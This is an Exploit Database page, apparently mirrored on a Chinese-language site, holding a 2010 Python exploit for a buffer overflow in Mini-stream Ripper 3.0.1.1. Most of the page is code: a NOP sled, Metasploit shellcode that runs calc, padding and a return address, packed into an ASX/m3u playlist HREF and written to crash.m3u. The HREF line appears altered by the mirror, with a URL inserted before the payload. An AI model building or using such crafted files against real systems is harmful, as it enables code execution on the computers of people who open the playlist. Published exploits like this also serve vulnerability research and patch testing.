Mini-stream Ripper 3.0.1.1 – ‘.m3u’ HREF Buffer Overflow

• Exploit Database
• 8 阅读

• 作者： l3D
  日期： 2010-03-10
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11682/

• #!/usr/bin/env python
  #Mini-stream Ripper 3.0.1.1 (.m3u) Buffer Overflow Code Execution
  #Software Link: http://www.mini-stream.net/downloads/Mini-streamRipper.exe
  #Author: l3D
  #Site: http://xraysecurity.blogspot.com
  #IRC: irc://irc.nix.co.il
  #Email: pupipup33@gmail.com
  
  nops1='\x90'*0x2a80
  #system("calc") - Metasploit.com
  shellcode=("\xb8\x19\xfc\x3c\x9b\xd9\xc4\x31\xc9\xb1\x32\xd9\x74\x24\xf4"
  "\x5b\x83\xeb\xfc\x31\x43\x0e\x03\x5a\xf2\xde\x6e\xa0\xe2\x96"
  "\x91\x58\xf3\xc8\x18\xbd\xc2\xda\x7f\xb6\x77\xeb\xf4\x9a\x7b"
  "\x80\x59\x0e\x0f\xe4\x75\x21\xb8\x43\xa0\x0c\x39\x62\x6c\xc2"
  "\xf9\xe4\x10\x18\x2e\xc7\x29\xd3\x23\x06\x6d\x09\xcb\x5a\x26"
  "\x46\x7e\x4b\x43\x1a\x43\x6a\x83\x11\xfb\x14\xa6\xe5\x88\xae"
  "\xa9\x35\x20\xa4\xe2\xad\x4a\xe2\xd2\xcc\x9f\xf0\x2f\x87\x94"
  "\xc3\xc4\x16\x7d\x1a\x24\x29\x41\xf1\x1b\x86\x4c\x0b\x5b\x20"
  "\xaf\x7e\x97\x53\x52\x79\x6c\x2e\x88\x0c\x71\x88\x5b\xb6\x51"
  "\x29\x8f\x21\x11\x25\x64\x25\x7d\x29\x7b\xea\xf5\x55\xf0\x0d"
  "\xda\xdc\x42\x2a\xfe\x85\x11\x53\xa7\x63\xf7\x6c\xb7\xcb\xa8"
  "\xc8\xb3\xf9\xbd\x6b\x9e\x97\x40\xf9\xa4\xde\x43\x01\xa7\x70"
  "\x2c\x30\x2c\x1f\x2b\xcd\xe7\x64\xc3\x87\xaa\xcc\x4c\x4e\x3f"
  "\x4d\x11\x71\x95\x91\x2c\xf2\x1c\x69\xcb\xea\x54\x6c\x97\xac"
  "\x85\x1c\x88\x58\xaa\xb3\xa9\x48\xc9\x52\x3a\x10\x0e")
  nops2='\x90'*(0xa9ff-len(nops1+shellcode))
  ret='\x30\x3D\x0D'
  payload=nops1+shellcode+nops2+ret
  
  evil="""<ASX Version="3.0">
  <ENTRY>
  <REF HREF="https://www.exploit-db.com/exploits/11682/%s"/>
  </ENTRY>
  </ASX>
  """ % payload
  
  bad=open('crash.m3u', 'w')
  bad.write(evil)
  bad.close()